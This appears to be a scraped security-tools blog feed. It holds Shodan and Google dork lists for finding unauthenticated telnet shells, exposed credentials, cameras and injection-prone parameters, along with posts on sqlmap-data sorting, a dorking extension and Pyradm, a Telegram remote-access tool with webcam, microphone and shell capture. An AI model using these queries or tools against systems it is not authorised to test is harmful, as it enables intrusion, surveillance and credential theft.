-gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. <code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. π More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. <code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with <a href="https://www.kitploit.com/search/label/Anonymous" target="_blank" title="Anonymous">Anonymous</a> Login</h3> <p><code>"220" "230 Login successful." port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers & Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Etherium Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="Directory">Directory</a> Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lothos612/shodan" rel="nofollow" target="_blank" title="Download Shodan">Download Shodan</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-28563560138004185342024-03-17T08:30:00.005-03:002024-03-17T08:30:00.135-03:00mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345629037921874834" src="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu=w640-h640" width="640" /></a></p> <p><strong><br /></strong></p><p><strong>mapXplore</strong> is a modular application that imports data extracted of the <a href="https://www.kitploit.com/search/label/SQLMap" target="_blank" title="sqlmap">sqlmap</a> to <a href="https://www.kitploit.com/search/label/PostgreSQL" target="_blank" title="PostgreSQL">PostgreSQL</a> or <a href="https://www.kitploit.com/search/label/SQLite" target="_blank" title="SQLite">SQLite</a> database.</p> <p>Its main features are:</p> <ul> <li>Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.</li> <li>Sanitized information, which means that at the time of import, it decodes or transforms unreadable information into readable information.</li> <li>Search for information in all tables, such as passwords, users, and desired information.</li> <li> <p>Automatic export of information stored in <strong>base64</strong>, such as:</p> <ul> <li>Word, Excel, PowerPoint files</li> <li>.zip files</li> <li>Text files or plain text information</li> <li>Images</li> </ul> </li> <li> <p>Filter tables and columns by criteria.</p> </li> <li>Filter by different types of hash functions without requiring prior conversion.</li> <li>Export relevant information to Excel or HTML</li></ul><span><a name='more'></a></span><div><br /></div> <h1>Installation</h1> <h2>Requirements</h2> <ul> <li>python-3.11</li> </ul> <pre><code>git clone https://github.com/daniel2005d/mapXplore<br />cd mapXplore<br />pip install -r requirements<br /></code></pre> <h1>Usage</h1> <p>It is a modular application, and consists of the following:</p> <ul> <li><strong>config</strong>: It is responsible for configuration, such as the database <a href="https://www.kitploit.com/search/label/Engine" target="_blank" title="engine">engine</a> to use, import paths, among others.</li> <li><strong>import</strong>: It is responsible for importing and processing the information extracted from <strong>sqlmap</strong>.</li> <li><strong>query</strong>: It is the main module capable of filtering and extracting the required information.<ul> <li>Filter by tables</li> <li>Filter by columns</li> <li>Filter by one or more words</li> <li>Filter by one or more hash functions within which are:<ul> <li>MD5</li> <li>SHA1</li> <li>SHA256</li> <li>SHA3</li> <li>....</li> </ul> </li> </ul> </li> </ul> <h3>Beginning</h3> <blockquote> <p>Allows loading a default configuration at the start of the program</p> </blockquote> <pre><code>python engine.py [--config config.json]<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7345629069448547762" src="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s=w640-h292" width="640" /></a></p> <h2>Modules</h2> <ul> <li><a href="https://github.com/daniel2005d/doc/en/configuration.md" rel="nofollow" target="_blank" title="config">config</a></li> <li><a href="https://github.com/daniel2005d/doc/en/import.md" rel="nofollow" target="_blank" title="import">import</a></li> <li><a href="https://github.com/daniel2005d/doc/en/main.md" rel="nofollow" target="_blank" title="principal|search">principal|search</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/daniel2005d/mapXplore" rel="nofollow" target="_blank" title="Download mapXplore">Download mapXplore</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-30578830815800991132024-03-16T08:30:00.007-03:002024-03-16T08:30:00.240-03:00Dorkish - Chrome Extension Tool For OSINT & Recon<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345707297268900690" src="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U=w542-h640" width="542" /></a></p><br /> <p>During <a href="https://www.kitploit.com/search/label/Reconaissance" target="_blank" title="reconaissance">reconaissance</a> phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish. <br /> Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> and OSINT engagement.</p><span><a name='more'></a></span><p><br /></p> <h1>Installation And Setup</h1> <p>1- Clone the repository </p> <pre><code>git clone https://github.com/yousseflahouifi/dorkish.git<br /></code></pre> <p>2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.<br /> 3- click on Load unpacked extension button and select the dorkish folder.</p> <p><strong>Note:</strong> For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/</p> <h1>Features</h1> <h2>Google dorking</h2> <ul> <li>Builder with keywords to filter your google search results.</li> <li>Prebuilt dorks for Bug bounty programs.</li> <li>Prebuilt dorks used during the reconnaissance phase in bug bounty.</li> <li>Prebuilt dorks for exposed files and directories</li> <li>Prebuilt dorks for logins and sign up portals</li> <li>Prebuilt dorks for cyber secruity jobs</li> </ul> <h2>Shodan dorking</h2> <ul> <li>Builder with filter keywords used in shodan.</li> <li>Varierty of prebuilt dorks to find IOT , Network <a href="https://www.kitploit.com/search/label/Infrastructure" target="_blank" title="infrastructure">infrastructure</a> , <a href="https://www.kitploit.com/search/label/Cameras" target="_blank" title="cameras">cameras</a> , ICS , databases , etc.</li> </ul> <h1>Usage</h1> <p>Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.</p> <h1>TODO</h1> <ul> <li>Add more useful dorks and catogories</li> <li>Fix some bugs</li> <li>Add a search bar to search through the results</li> <li>Might add some LLM models to build dorks</li></ul> <h1>Notes</h1> <p>I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty</p> <h1>Warning</h1> <ul> <li>I am not responsible for any damage caused by using the tool</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/yousseflahouifi/dorkish" rel="nofollow" target="_blank" title="Download Dorkish">Download Dorkish</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-24110378230006001572024-03-15T08:30:00.019-03:002024-03-15T08:30:00.251-03:00Pyradm - Python Remote Administration Tool Via Telegram<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8" style="text-align: left;"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a></p><p><br /></p> <blockquote> <p>Remote administration crossplatfrom tool via telegram\ Coded with β€οΈ <strong>python3</strong> + <strong>aiogram3</strong>\ https://t.me/pt_soft</p> </blockquote> <h2>v0.3</h2> <ul> <li>[X] <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="Screenshot">Screenshot</a> from target</li> <li>[X] Crossplatform</li> <li>[X] Upload/Download</li> <li>[X] Fully compatible shell</li> <li>[X] Process list</li> <li>[X] <a href="https://www.kitploit.com/search/label/Webcam" target="_blank" title="Webcam">Webcam</a> (video record or screenshot)</li> <li>[X] Geolocation</li> <li>[X] Filemanager</li> <li>[X] Microphone</li> <li>[X] Clipboard (text, image)</li> </ul><span><a name='more'></a></span><div><br /></div> <h2>Functional</h2> <pre><code>/start - start pyradm<br />/help - help<br />/shell - shell commands<br />/sc - screenshot<br />/download - download (abs. path)<br />/info - system info<br />/ip - public ip address and geolocation<br />/ps - process list<br />/webcam 5 - record video (secs)<br />/webcam - screenshot from camera<br />/fm - filemanager<br />/fm /home or /fm C:\<br />/mic 10 - <a href="https://www.kitploit.com/search/label/Record%20Audio" target="_blank" title="record audio">record audio</a> from mic<br />/clip - get clipboard data<br />Press button to download file<br />Send any file as file for upload to target<br /></code></pre> <h2>Install</h2> <ul> <li><code>git clone https://github.com/akhomlyuk/pyradm.git</code></li> <li><code>cd pyradm</code></li> <li><code>pip3 install -r requirements.txt</code></li> <li><code>Put bot <a href="https://www.kitploit.com/search/label/Token" target="_blank" title="token">token</a> to cfg.py, ask @Bothfather</code></li> <li><code>python3 main.py</code></li> </ul> <h2>Compile</h2> <ul> <li><code>Put bot token to cfg.py</code></li> <li><code>pip install nuitka</code></li> <li><code>nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py</code></li> </ul> <h2>Screens</h2> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705598837786290" src="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA=w612-h640" width="612" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705607758732882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA=w352-h640" width="352" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4"><img alt="" border="0" height="624" id="BLOGGER_PHOTO_ID_7345705610000417314" src="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4=w640-h624" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM"><img alt="" border="0" height="596" id="BLOGGER_PHOTO_ID_7345705613876228946" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM=w640-h596" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg"><img alt="" border="0" height="576" id="BLOGGER_PHOTO_ID_7345705622803912882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg=w640-h576" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/akhomlyuk/pyradm" rel="nofollow" target="_blank" title="Download Pyradm">Download Pyradm</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47449134233814466432024-03-14T08:30:00.007-03:002024-03-14T08:30:00.232-03:00Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7345638495062138434" src="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv=w640-h122" width="640" /></a></p><p><br /></p> <p>A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting</p> <p><a href="https://taksec.github.io/google-dorks-bug-bounty/" rel="nofollow" target="_blank" title="Live Tool">Live Tool</a></p> <span><a name='more'></a></span><p><br /></p> <p><a href="https://twitter.com/TakSec" rel="nofollow" target="_blank" title="A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting (3)"></a></p> <h3>Broad domain search w/ negative search</h3> <blockquote> <p>site:example.com -www -shop -share -ir -mfa</p> </blockquote> <h3>PHP extension w/ parameters</h3> <blockquote> <p>site:example.com ext:php inurl:?</p> </blockquote> <h3>Disclosed <a href="https://www.kitploit.com/search/label/XSS" target="_blank" title="XSS">XSS</a> and Open Redirects</h3> <blockquote> <p>site:openbugbounty.org inurl:reports intext:"example.com"</p> </blockquote> <h3>Juicy Extensions</h3> <blockquote> <p>site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess</p> </blockquote> <h3>XSS prone parameters</h3> <blockquote> <p>inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com</p> </blockquote> <h3>Open Redirect prone parameters</h3> <blockquote> <p>inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com</p> </blockquote> <h3>SQLi Prone Parameters</h3> <blockquote> <p>inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com</p> </blockquote> <h3>SSRF Prone Parameters</h3> <blockquote> <p>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com</p> </blockquote> <h3>LFI Prone Parameters</h3> <blockquote> <p>inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com</p> </blockquote> <h3>RCE Prone Parameters</h3> <blockquote> <p>inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com</p> </blockquote> <h3>High % inurl keywords</h3> <blockquote> <p>inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com</p> </blockquote> <h3>Sensitive Parameters</h3> <blockquote> <p>inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com</p> </blockquote> <h3>API Docs</h3> <blockquote> <p>inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"</p> </blockquote> <h3>Code Leaks</h3> <blockquote> <p>site:pastebin.com "example.com"</p> <p>site:jsfiddle.net "example.com"</p> <p>site:codebeautify.org "example.com"</p> <p>site:codepen.io "example.com"</p> </blockquote> <h3>Cloud Storage</h3> <blockquote> <p>site:s3.amazonaws.com "example.com"</p> <p>site:blob.core.windows.net "example.com"</p> <p>site:googleapis.com "example.com"</p> <p>site:drive.google.com "example.com"</p> <p>site:dev.azure.com "example[.]com"</p> <p>site:onedrive.live.com "example[.]com"</p> <p>site:digitaloceanspaces.com "example[.]com"</p> <p>site:sharepoint.com "example[.]com"</p> <p>site:s3-external-1.amazonaws.com "example[.]com"</p> <p>site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"</p> <p>site:dropbox.com/s "example[.]com"</p> <p>site:box.com/s "example[.]com"</p> <p>site:docs.google.com inurl:"/d/" "example[.]com"</p> </blockquote> <h3>JFrog Artifactory</h3> <blockquote> <p>site:jfrog.io "example[.]com"</p> </blockquote> <h3>Firebase</h3> <blockquote> <p>site:firebaseio.com "example[.]com"</p> </blockquote> <h3>File upload endpoints</h3> <blockquote> <p>site:example.com "choose file"</p> </blockquote> <h2>Dorks that work better w/o domain</h2> <h3>Bug Bounty programs and <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="Vulnerability">Vulnerability</a> Disclosure Programs</h3> <blockquote> <p>"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"</p> <p>site:*/security.txt "bounty"</p> </blockquote> <h3>Apache Server Status Exposed</h3> <blockquote> <p>site:*/server-status apache</p> </blockquote> <h3>WordPress</h3> <blockquote> <p>inurl:/wp-admin/admin-ajax.php</p> </blockquote> 